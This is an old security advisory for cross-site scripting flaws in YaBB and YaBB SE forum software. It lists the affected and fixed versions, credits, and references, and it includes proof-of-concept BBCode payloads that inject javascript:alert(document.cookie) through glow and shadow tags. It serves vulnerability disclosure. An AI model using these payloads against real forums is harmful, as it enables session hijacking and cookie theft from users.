YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

Bugtraq ID:	9873
Class:	Input Validation Error
CVE:
Remote:	Yes
Local:	No
Published:	Mar 15 2004 12:00AM
Updated:	Mar 15 2004 12:00AM
Credit:	Discovery of this issue is credited to Cheng Peng Su <[email protected]> this issue was also independently discovered by frog-m@n.
Vulnerable:	YaBB SE YaBB SE 1.5.1 YaBB SE Simple Machines SMF 1.0 b YaBB YaBB 1 Gold - SP 1.3
Not Vulnerable:	YaBB YaBB 1 Gold - SP 1.3.2

YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

It has been reported that YaBB and YaBB SE are prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure of the applications to properly validate URI supplied user input.

Attackers may exploit this vulnerability to steal authentication credentials. Other attacks may also be possible.

YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

No exploit is required to leverage this issue. The following proof of concept has been provided:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

The following proof of concept has been supplied by frog-m@n:
[glow=red,2);background:url(javascript:[SCRIPT],300]text[/glow]

YABB/YABB SE Multiple Cross-Site Scripting Vulnerabilites

References:

• [RELEASE] YaBB 1 Gold - SP 1.3.2 (YaBB)
  
• Simple Machines SMF Homepage (Simple Machines)
  
• YaBB Homepage (YaBB)
  
• YaBB SE Project Page (YaBB SE)
  
• RE: YaBB/YaBBse Cross Site Scripting Vulnerability ("Frog Man" )
  
• YaBB/YaBBse Cross Site Scripting Vulnerability (Cheng Peng Su )